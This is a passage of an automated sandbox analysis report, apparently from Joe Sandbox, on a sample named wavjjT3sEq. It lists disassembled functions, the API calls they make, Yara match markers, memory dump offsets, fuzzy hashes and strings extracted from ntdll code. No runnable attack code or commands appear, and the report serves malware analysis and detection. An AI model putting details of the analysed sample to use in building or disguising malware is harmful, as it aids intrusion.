                                                                                                                                                              • Opcode Fuzzy Hash: b718d9d7ec66ca47dea8d14403af8c3bf72dd340a34540cb47ce01b1113aa437
                                                                                                                                                              • Instruction Fuzzy Hash: 3E90023120150413D1157158450C707404D9BD0241F95C422A0464558DD6568A52A221
                                                                                                                                                              Function 01962C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 87 1962c70-1962c7c LdrInitializeThunk
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 8055aea14ab7b88b25826921186c591e568560d36c90202e13de019ae869baf3
                                                                                                                                                              • Instruction ID: c4e71a7086309dd2fe3367d763fcf027edf77506a9fbc6924d95cec9ac6a08c2
                                                                                                                                                              • Opcode Fuzzy Hash: 8055aea14ab7b88b25826921186c591e568560d36c90202e13de019ae869baf3
                                                                                                                                                              • Instruction Fuzzy Hash: 8D90023120158802D1147158840C74A40499BD0301F59C421A4464658DC69589917221
                                                                                                                                                              Function 019635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 89 19635c0-19635cc LdrInitializeThunk
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: f04a9be9ef99b2f2feb17b9d2beb60f1f9fb6f6a528a03d08e6960eb55dc3bc3
                                                                                                                                                              • Instruction ID: 1ae0065d480f3158949c3ded3739873f828b38a783ab809c5d9955b2036f13fa
                                                                                                                                                              • Opcode Fuzzy Hash: f04a9be9ef99b2f2feb17b9d2beb60f1f9fb6f6a528a03d08e6960eb55dc3bc3
                                                                                                                                                              • Instruction Fuzzy Hash: A690023160560402D1047158451C70650499BD0201F65C421A0464568DC7958A5166A2
                                                                                                                                                              Function 001387F3 Relevance: .4, Instructions: 437COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: beb166f2f31674ca0194f9ee58dc63f016d9e29546bd61792ba9995930bc2e0f
                                                                                                                                                              • Instruction ID: f9d03b9ff702a6edd69873a54119a3cec207fd6993dcfd5f3d7ac27671c8dd22
                                                                                                                                                              • Opcode Fuzzy Hash: beb166f2f31674ca0194f9ee58dc63f016d9e29546bd61792ba9995930bc2e0f
                                                                                                                                                              • Instruction Fuzzy Hash: 94F17FB1D0031AAFDF24DFA4CC85AAEF7B9BF54300F1482A9F515A7241DB705A45CBA1
                                                                                                                                                              Function 00121A70 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b797360d5877a4945d69cd5edff270cddb8fd420988690ff83d2f09e51c66b6f
                                                                                                                                                              • Instruction ID: 1a91bf36052d594462b9201d3ea82a4c40a45753edf89efdd8815479e4d3d9ea
                                                                                                                                                              • Opcode Fuzzy Hash: b797360d5877a4945d69cd5edff270cddb8fd420988690ff83d2f09e51c66b6f
                                                                                                                                                              • Instruction Fuzzy Hash: 67313272B001645BDB2CC508DC612A9B7B2EBE4350F58826AEA06DF7D0F624AE2087C1
                                                                                                                                                              Function 001341E1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58threadwindowCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • PostThreadMessageW.USER32(1863I7301,00000111,00000000,00000000), ref: 00134260
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                              • String ID: 1863I7301$1863I7301
                                                                                                                                                              • API String ID: 1836367815-3745599348
                                                                                                                                                              • Opcode ID: f82b3489c07bb7bba87b4eb726f7e6691780f768484c8221fa741478fa425193
                                                                                                                                                              • Instruction ID: f09638a10f08f94f22d6d42bed849da367c872367f93b1cbcb37bff2b23f77f5
                                                                                                                                                              • Opcode Fuzzy Hash: f82b3489c07bb7bba87b4eb726f7e6691780f768484c8221fa741478fa425193
                                                                                                                                                              • Instruction Fuzzy Hash: 3201D271D40218B7EB21AAE09C42FEFBB7C9F41B50F148055FA047B2C2D7B466068BE6
                                                                                                                                                              Function 001341E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • PostThreadMessageW.USER32(1863I7301,00000111,00000000,00000000), ref: 00134260
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                              • String ID: 1863I7301$1863I7301
                                                                                                                                                              • API String ID: 1836367815-3745599348
                                                                                                                                                              • Opcode ID: a3f97eb2583523ad50d7cc5734a062fdc3966a9ffe998e370a34981ffe5104b2
                                                                                                                                                              • Instruction ID: 952492a2f8fe81b3cb07ba159b2ef30471805c95655c560ce3c163783df6884f
                                                                                                                                                              • Opcode Fuzzy Hash: a3f97eb2583523ad50d7cc5734a062fdc3966a9ffe998e370a34981ffe5104b2
                                                                                                                                                              • Instruction Fuzzy Hash: 5901D271D40218B7EB21AAE09C42FEFBB7C9F41B50F148055FA047B2C2D7B466068BE6
                                                                                                                                                              Function 0014CBE3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 62 14cbe3-14cc27 call 124843 call 14db13 RtlAllocateHeap
                                                                                                                                                              APIs
                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,0013E7BE,?,?,00000000,?,0013E7BE,?,?,?), ref: 0014CC22
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                              • Opcode ID: b6deca932c6654ca86d4eb412088f9019d810c86403fd3c820abf9ad62f2039c
                                                                                                                                                              • Instruction ID: 0fdf89c1ebfcbd9fa41aeb357431ae20e3c038677fa5cd7d0596892682ea4f15
                                                                                                                                                              • Opcode Fuzzy Hash: b6deca932c6654ca86d4eb412088f9019d810c86403fd3c820abf9ad62f2039c
                                                                                                                                                              • Instruction Fuzzy Hash: 6EE06D712042047BDA10EE98EC41FDB33ACEF85710F000018FA08A7241E770B9108AB4
                                                                                                                                                              Function 0014CC33 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 67 14cc33-14cc77 call 124843 call 14db13 RtlFreeHeap
                                                                                                                                                              APIs
                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,C4830C75,00000007,00000000,00000004,00000000,0013720F,000000F4), ref: 0014CC72
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                              • Opcode ID: 38eafd8a1ea63597223e5a1425a7c26f04ed257e1e495f63d6fb01429785e211
                                                                                                                                                              • Instruction ID: 83a2bf3d18633961454cb89043822baef1f63ec84093ea4fc48d8479eb178bb6
                                                                                                                                                              • Opcode Fuzzy Hash: 38eafd8a1ea63597223e5a1425a7c26f04ed257e1e495f63d6fb01429785e211
                                                                                                                                                              • Instruction Fuzzy Hash: 03E0ED753142157BDA14EE99EC41EAB77ACEF85750F104419FA08A7242DB70B9148BB4
                                                                                                                                                              Function 0014CC83 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 77 14cc83-14ccbc call 124843 call 14db13 ExitProcess
                                                                                                                                                              APIs
                                                                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,174F840D,?,?,174F840D), ref: 0014CCB7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                              • Opcode ID: 657fc2068f50c85c9734239eb842ba7256170667a099f2beb8aaa4f4faf4d97b
                                                                                                                                                              • Instruction ID: 03004fa31b2ff833c863c4e11626e06cdb840bfb5eb5eb1065b9adb4de4b2507
                                                                                                                                                              • Opcode Fuzzy Hash: 657fc2068f50c85c9734239eb842ba7256170667a099f2beb8aaa4f4faf4d97b
                                                                                                                                                              • Instruction Fuzzy Hash: 67E04F312002147BD620EA6AEC42F9B775CDFC6750F004029FA0CA7242D670BA1086B4
                                                                                                                                                              Function 01962C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 82 1962c0a-1962c0f 83 1962c11-1962c18 82->83 84 1962c1f-1962c26 LdrInitializeThunk 82->84
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 6dd2e59d232d9de3b60771a625f94e67bf46f49175e58542fe50eaa73a6dcd2d
                                                                                                                                                              • Instruction ID: b69de59f4f67094dbdc195185d6c1637f056c8ff925a8a577b81c70f78390aad
                                                                                                                                                              • Opcode Fuzzy Hash: 6dd2e59d232d9de3b60771a625f94e67bf46f49175e58542fe50eaa73a6dcd2d
                                                                                                                                                              • Instruction Fuzzy Hash: E5B09B71D015C5C9DA15F764460C71779487BD0701F15C071D2070641F473CC1D1E275

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 019A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-2160512332
                                                                                                                                                              • Opcode ID: 9fb1860ce55770feb1d14c7b4cd931898096c312aebe27c11c97cb0be11cca65
                                                                                                                                                              • Instruction ID: 838f389c0dafd2fff93fe5340a4e5acdee2ff53e1cf9256df4c05cd7e97ab564
                                                                                                                                                              • Opcode Fuzzy Hash: 9fb1860ce55770feb1d14c7b4cd931898096c312aebe27c11c97cb0be11cca65
                                                                                                                                                              • Instruction Fuzzy Hash: 95928071604342AFE721CF28C880F6BB7E8BB84754F54492DFA98D7251D770E948CB92
                                                                                                                                                              Function 019168B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-3089669407
                                                                                                                                                              • Opcode ID: fe493bbb0334f293ac8e328400313bed29eda60cf5d61de104a3239dc8759148
                                                                                                                                                              • Instruction ID: 84b30009d23d60db29d68ada78a58dd1e9ee76b452b55c1e7212fb28ae7ecaa6
                                                                                                                                                              • Opcode Fuzzy Hash: fe493bbb0334f293ac8e328400313bed29eda60cf5d61de104a3239dc8759148
                                                                                                                                                              • Instruction Fuzzy Hash: 6B814FB6D0121DAF9B11EAE4DDD1EEF77BEEF44650B450426BA04F7204E621EE05CBA0
                                                                                                                                                              Function 019C5910 Relevance: 18.5, Strings: 14, Instructions: 963COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • @, xrefs: 019C6277
                                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 019C5FE1
                                                                                                                                                              • Control Panel\Desktop, xrefs: 019C615E
                                                                                                                                                              • LanguageConfigurationPending, xrefs: 019C6221
                                                                                                                                                              • @, xrefs: 019C647A
                                                                                                                                                              • @, xrefs: 019C6027
                                                                                                                                                              • InstallLanguageFallback, xrefs: 019C6050
                                                                                                                                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 019C5A84
                                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 019C635D
                                                                                                                                                              • @, xrefs: 019C61B0
                                                                                                                                                              • PreferredUILanguages, xrefs: 019C63D1
                                                                                                                                                              • PreferredUILanguagesPending, xrefs: 019C61D2
                                                                                                                                                              • LanguageConfiguration, xrefs: 019C6420
                                                                                                                                                              • @, xrefs: 019C63A0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                                                              • API String ID: 0-1325123933
                                                                                                                                                              • Opcode ID: f7b534ff5e91d6dc6c2ccea9e2d2a441b57adb2f7a598668012929c215c31684
                                                                                                                                                              • Instruction ID: 74c241664cdd7f70cf5f721efc2dcca6950cbb1d12920cd08e38775daf2ade19
                                                                                                                                                              • Opcode Fuzzy Hash: f7b534ff5e91d6dc6c2ccea9e2d2a441b57adb2f7a598668012929c215c31684
                                                                                                                                                              • Instruction Fuzzy Hash: F07228716083419BE325DF29C840B6BBBE9BBD8B04F45492DFAC997250E734E905CB63
                                                                                                                                                              Function 01958620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019954E2
                                                                                                                                                              • corrupted critical section, xrefs: 019954C2
                                                                                                                                                              • 8, xrefs: 019952E3
                                                                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01995543
                                                                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019954CE
                                                                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0199540A, 01995496, 01995519
                                                                                                                                                              • Critical section address., xrefs: 01995502
                                                                                                                                                              • Critical section address, xrefs: 01995425, 019954BC, 01995534
                                                                                                                                                              • Critical section debug info address, xrefs: 0199541F, 0199552E
                                                                                                                                                              • double initialized or corrupted critical section, xrefs: 01995508
                                                                                                                                                              • Invalid debug info address of this critical section, xrefs: 019954B6
                                                                                                                                                              • Address of the debug info found in the active list., xrefs: 019954AE, 019954FA
                                                                                                                                                              • Thread identifier, xrefs: 0199553A
                                                                                                                                                              • undeleted critical section in freed memory, xrefs: 0199542B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                              • API String ID: 0-2368682639
                                                                                                                                                              • Opcode ID: 733c2656ad7cff0df20baaf20b7774f9b0de794cbb154625c3178e5bdad0638e
                                                                                                                                                              • Instruction ID: 7b3aab70945cd82104ecf3c531503453aa368a29bc49063ba56ef07a1e8f3db9
                                                                                                                                                              • Opcode Fuzzy Hash: 733c2656ad7cff0df20baaf20b7774f9b0de794cbb154625c3178e5bdad0638e
                                                                                                                                                              • Instruction Fuzzy Hash: DA818F71E00348EFEF21CF99C845BAEBBB9AB88B14F11415AE50CB7291D371A941CB60
                                                                                                                                                              Function 019529F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01992409
                                                                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01992624
                                                                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01992498
                                                                                                                                                              • @, xrefs: 0199259B
                                                                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019922E4
                                                                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0199261F
                                                                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01992602
                                                                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01992506
                                                                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019924C0
                                                                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01992412
                                                                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019925EB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                              • API String ID: 0-4009184096
                                                                                                                                                              • Opcode ID: 221aee61dedd2e35374e4e3ebd437fa1339877d0a756018ac929443d6877f8a5
                                                                                                                                                              • Instruction ID: 91124e71ffa9f6a7cef838340f2d2c3c3cd6dc52475405812298257f002f8426
                                                                                                                                                              • Opcode Fuzzy Hash: 221aee61dedd2e35374e4e3ebd437fa1339877d0a756018ac929443d6877f8a5
                                                                                                                                                              • Instruction Fuzzy Hash: 290271B1D00229AFDF61DB58CC80BD9B7B8AB54714F4441DAAA4DB7242D730AE84CF99
                                                                                                                                                              Function 01950F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                                                                                              • API String ID: 0-360209818
                                                                                                                                                              • Opcode ID: 0c257c77aaae1bdfcdb2b1477b461f559c3131a3b35f5edd6faaa8070b579f20
                                                                                                                                                              • Instruction ID: 594c57ad36ebc70f032e1aabd949c728ac0815edd7c458d87e5e839548e805d8
                                                                                                                                                              • Opcode Fuzzy Hash: 0c257c77aaae1bdfcdb2b1477b461f559c3131a3b35f5edd6faaa8070b579f20
                                                                                                                                                              • Instruction Fuzzy Hash: 89629FB5A0022A8FDF24CF1CC8417A9B7B6BF95321F5482EAD94DAB240D7325AD1CF51
                                                                                                                                                              Function 019C8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                              • API String ID: 0-2515994595
                                                                                                                                                              • Opcode ID: 39cd2dff7b9f5c7656d609c10743037f2b8977358c81ab6911cb1ac135140fbe
                                                                                                                                                              • Instruction ID: 0dc24f6ebc78a7732deebfb1de4ae928325f8a60ead8f886f79904a4327564bb
                                                                                                                                                              • Opcode Fuzzy Hash: 39cd2dff7b9f5c7656d609c10743037f2b8977358c81ab6911cb1ac135140fbe
                                                                                                                                                              • Instruction Fuzzy Hash: 4751A0715143159BD729DF188844BABBBECEF94B50F14492DEA9DC3240E770D608CB93
                                                                                                                                                              Function 019D12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
